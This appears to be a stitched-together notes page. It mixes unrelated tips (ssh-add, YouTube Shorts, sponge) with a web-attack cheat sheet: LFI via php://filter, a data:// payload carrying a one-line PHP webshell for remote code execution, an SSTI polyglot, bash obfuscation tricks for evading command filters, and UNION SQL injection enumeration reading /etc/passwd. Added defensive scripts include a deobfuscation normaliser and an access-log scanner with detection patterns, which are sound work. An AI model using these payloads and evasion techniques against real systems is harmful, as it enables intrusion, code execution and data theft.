ssh-add --apple-use-keychain --apple-load-keychain ~/.ssh/id_ed25519
There’s no global setting to remove YouTube shorts, but I’ve found that by saying “not interested” to every one which pops up they’ve been removed from my feed.
Right now I’m not sure how long this will be in effect for, but it’s at least a temporary solution.
Reading from and writing to the same file in one pipeline can truncate or corrupt it (the shell truncates the output file before the filter reads a byte), so use sponge from moreutils to "soak up standard input and write to a file": it reads the whole input before opening the output, which ensures the file is processed in its entirety before being written back to the same path.
tail -r file.txt | sponge file.txt
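The truncation hazard and the sponge technique, as an added example that is not part of the original note. The stand-in for sponge is called soak here (our name, not moreutils'); line reversal is done with awk because tail -r exists only on BSD systems and tac only on GNU ones.

```shell
#!/bin/sh
# Added example, not from the original note: why "filter file > file" empties the
# file, and a minimal stand-in for moreutils' sponge (called soak here; the name is
# ours). Reversal is done with awk because tail -r is BSD-only and tac is GNU-only.

# soak: read ALL of stdin into a temporary file, then rename it over the target.
# This is sponge's trick: the target is not touched until the input is consumed.
soak() {
    target=$1
    tmp=$(mktemp "${target}.XXXXXX") || return 1
    cat > "$tmp" && mv "$tmp" "$target"
}

# Portable line reversal for the demo.
reverse_lines() {
    awk '{ line[NR] = $0 } END { for (i = NR; i > 0; i--) print line[i] }'
}

# The hazard: the shell opens (and truncates) the output file before the filter
# reads a single byte, so the filter sees an empty file. Prints the line count left.
unsafe_rewrite_linecount() {
    f=$(mktemp) || return 1
    printf '1\n2\n3\n' > "$f"
    reverse_lines < "$f" > "$f"
    wc -l < "$f" | tr -d ' '
    rm -f "$f"
}

# The fix: soak reads everything first, so the reversed content survives.
safe_rewrite_content() {
    f=$(mktemp) || return 1
    printf '1\n2\n3\n' > "$f"
    reverse_lines < "$f" | soak "$f"
    cat "$f"
    rm -f "$f"
}

echo "lines left after unsafe rewrite: $(unsafe_rewrite_linecount)"
echo "content after safe rewrite:"
safe_rewrite_content
```

The rename in soak is atomic on the same filesystem, so a reader that opens the file mid-way sees either the old or the new content, never a half-written one.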
Imagine a PHP file vulnerable to local file inclusion (LFI), such as
curl http://example.com/vuln.php?lang=en.php
On a misconfigured server and app you can use the php://filter read wrapper to retrieve the full source of the included file (base64-encoded, so it is returned rather than executed):
curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php
If allow_url_include is enabled, the data:// wrapper gives you a webshell or RCE:
curl 'http://example.com/vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami'
The decoded payload is the one-line webshell <?php system($_GET['cmd']);
The following string can be used to test a large number of templating engines in one go:
$ { { < % [ % ' " } } % \ .
Important: remove the spaces between the characters! They are included here only because the raw string breaks rendering in some places.
Inserting noop characters
An even number of unmixed quotes is ignored by bash: $ c'a't becomes $ cat, and likewise $ c"a"t.
Backslash-escaping ordinary characters (other than \n and friends, obviously) has no effect: $ c\at becomes $ cat.
Use the positional-parameter expansion $@, which expands to nothing when no arguments are set: $ c$@at becomes $ cat.
Manipulate the characters
$(rev<<<'tac') becomes cat. Experiment with other things like rot13.
Encode the command
$(base64 -d<<<"Y2F0Cg==") becomes cat
Whitespace
- %0a: newline
- %20: space
- %09: tab
- ${IFS}: Input Field Separators ↗️ (typically space, tab, newline)
- bash brace expansion: {ls,-la} turns into ls -la
Special characters
- forward slash: echo ${PATH:0:1}
- semicolon: echo ${LS_COLORS:10:1}
- pipe: instead of |, try a here-string with <<<
Shifting characters
This command shifts a printable character one position to the right: echo $(tr '!-}' '"-~'<<<[) prints \. The generator below builds the same tr call with a wrapped-around range, so that the last printable character ~ becomes !.
shift_generator() {
    # $1: number of positions to shift, $2: the character to encode
    local shift=$1
    local char=$2
    # the replacement set starts $shift characters into the printable range
    # (33 is '!') and wraps around to end $shift - 1 characters in
    local second_start=$((33 + shift))
    local second_end=$((33 + shift - 1))
    printf "echo \$(tr '\\!-~' '"
    printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
    printf "'<<<'%s')\n" "$char"
}
# usage
shift_generator 1 "~"
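From the other side of the table: when one of these obfuscated commands turns up in a shell history or EDR alert, a reviewer wants to see what it actually runs. The normalizer below is an added example, not part of the original notes; it statically undoes the no-op tricks listed above (quote pairs, backslashes, $@, ${IFS}, flat brace expansion) and leaves the encoded forms such as $(rev<<<'...') or base64 untouched, since those need decoding rather than stripping. Bash itself remains the only authoritative parser; treat this as a triage aid.

```shell
#!/bin/sh
# Added example, not from the original notes: a triage normalizer that statically
# strips the no-op obfuscation tricks documented above so a reviewer can read the
# command an attacker meant. Best effort only; bash is the authoritative parser.

# count_char CHAR STRING: number of occurrences of CHAR in STRING.
count_char() {
    printf '%s' "$2" | tr -cd "$1" | wc -c | tr -d ' '
}

normalize_cmd() {
    cmd=$1

    # 1. An even number of unmixed quotes contributes nothing: c'a't -> cat
    if [ $(( $(count_char "'" "$cmd") % 2 )) -eq 0 ]; then
        cmd=$(printf '%s' "$cmd" | tr -d "'")
    fi
    if [ $(( $(count_char '"' "$cmd") % 2 )) -eq 0 ]; then
        cmd=$(printf '%s' "$cmd" | tr -d '"')
    fi

    # 2. A backslash before an ordinary character is a no-op: c\at -> cat
    cmd=$(printf '%s' "$cmd" | sed 's/\\\([^\\]\)/\1/g')

    # 3. $@ expands to nothing when there are no positional parameters: c$@at -> cat
    cmd=$(printf '%s' "$cmd" | sed -e 's/\${@}//g' -e 's/\$@//g')

    # 4. ${IFS} / $IFS stand in for whitespace: ls${IFS}-la -> ls -la
    cmd=$(printf '%s' "$cmd" | sed -e 's/\${IFS}/ /g' -e 's/\$IFS/ /g')

    # 5. Flat brace expansion (one level, no nesting): {ls,-la} -> ls -la
    cmd=$(printf '%s' "$cmd" | sed -E \
        -e ':a' -e 's/\{([^{}]*),([^{}]*)\}/{\1 \2}/' -e 'ta' \
        -e 's/\{([^{},]*)\}/\1/g')

    printf '%s\n' "$cmd"
}

# Demo over the tricks listed in the notes (an odd quote count is left alone,
# because bash would not accept it either).
for sample in "c'a't" 'c"a"t' 'c\at' 'c$@at' 'ls${IFS}-la' '{ls,-la,/tmp}' "c'at"; do
    printf '%-16s -> %s\n' "$sample" "$(normalize_cmd "$sample")"
done
```

Each rule mirrors one bullet above, so extending it to a new trick is a one-line sed expression; anything the normalizer cannot reduce to a readable command is a good candidate for running in a sandbox rather than guessing.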
Tooling
For more advanced obfuscation you can consider tools such as:
Using a UNION-based injection we can enumerate the structure of a MySQL/MariaDB database.
Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that, and remember to add WHERE clauses to these to narrow down the search.
Databases
UNION SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
Tables
UNION SELECT TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES;
Columns
UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;
Privileges
UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES
After enumerating user privileges 🌿, if you find one with FILE you can use it to read files from the target:
UNION SELECT LOAD_FILE('/etc/passwd')
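The LFI wrappers, the SSTI polyglot and the UNION/INFORMATION_SCHEMA/LOAD_FILE enumeration above all leave a recognisable trace in the web server's access log. The script below is an added example, not part of the original notes: it URL-decodes each request target and flags those patterns, plus a check for the allow_url_include directive that turns the data:// trick into code execution. The log lines and the php.ini text are constructed for the example; the rule names are ours.

```shell
#!/bin/sh
# Added example, not part of the original notes: access-log triage that URL-decodes
# each request and flags the patterns documented above (php:// and data:// stream
# wrappers, the SSTI polyglot, UNION SELECT against INFORMATION_SCHEMA, LOAD_FILE).
# Log lines below are constructed, not real traffic.

# Decode %XX sequences and '+' in each stdin line (awk, so it runs on any POSIX sh).
urldecode() {
    awk '
    BEGIN { hex = "0123456789abcdef" }
    {
        s = $0; out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                h = tolower(substr(s, 2, 2))
                n = (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1
                out = out sprintf("%c", n)
                s = substr(s, 4)
            } else if (c == "+") {
                out = out " "; s = substr(s, 2)
            } else {
                out = out c; s = substr(s, 2)
            }
        }
        print out
    }'
}

# Print the rule names a decoded request target matches, space separated.
scan_request() {
    req=$1
    hits=""
    for rule in \
        'php-stream-wrapper|[?&=](php|data|expect|phar)://' \
        'ssti-polyglot|\{\{<%\[%' \
        'sql-union-select|union[[:space:]]+(all[[:space:]]+)?select' \
        'sql-information-schema|information_schema\.' \
        'sql-load-file|load_file[[:space:]]*\('
    do
        name=${rule%%|*}
        regex=${rule#*|}
        if printf '%s\n' "$req" | grep -Eiq -- "$regex"; then
            hits="$hits $name"
        fi
    done
    printf '%s\n' "${hits# }"
}

# Constructed sample log in Apache common format.
sample_log() {
    cat <<'EOF'
203.0.113.10 - - [01/Jan/2024:10:00:00 +0000] "GET /vuln.php?lang=en.php HTTP/1.1" 200 512
203.0.113.10 - - [01/Jan/2024:10:00:05 +0000] "GET /vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php HTTP/1.1" 200 4096
203.0.113.10 - - [01/Jan/2024:10:00:09 +0000] "GET /vuln.php?lang=data://text/plain;base64,SGVsbG8%3D HTTP/1.1" 200 64
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /items?id=1%20UNION%20SELECT%20TABLE_NAME,TABLE_SCHEMA%20FROM%20INFORMATION_SCHEMA.TABLES HTTP/1.1" 200 8192
198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /items?id=1%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27) HTTP/1.1" 200 2048
192.0.2.9 - - [01/Jan/2024:10:03:00 +0000] "GET /search?q=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C. HTTP/1.1" 200 300
192.0.2.44 - - [01/Jan/2024:10:04:00 +0000] "GET /items?id=42 HTTP/1.1" 200 300
EOF
}

# Pull the request target out of each line, decode it and report clients with hits.
scan_log() {
    while IFS= read -r line; do
        client=${line%% *}
        req=${line#*\"}; req=${req%%\"*}   # GET /path HTTP/1.1
        req=${req#* }; req=${req% *}       # /path
        decoded=$(printf '%s\n' "$req" | urldecode)
        hits=$(scan_request "$decoded")
        if [ -n "$hits" ]; then
            printf '%s %s\n' "$client" "$hits"
        fi
    done
}

# The data:// trick only yields code execution when allow_url_include is on:
# read php.ini text from stdin and print the directive if it is enabled.
check_allow_url_include() {
    grep -Ei '^[[:space:]]*allow_url_include[[:space:]]*=[[:space:]]*(on|1|true|yes)[[:space:]]*$' || true
}

sample_log | scan_log
```

Decoding before matching matters: the UNION and polyglot payloads arrive percent-encoded and a naive grep over the raw log misses them. The wrapper rule fires on php://, data://, expect:// and phar:// because any of them in a query parameter that reaches include() is worth a look, whether or not the request succeeded.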
Tools
- sqlmap ↗️ has a --proxy flag
Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!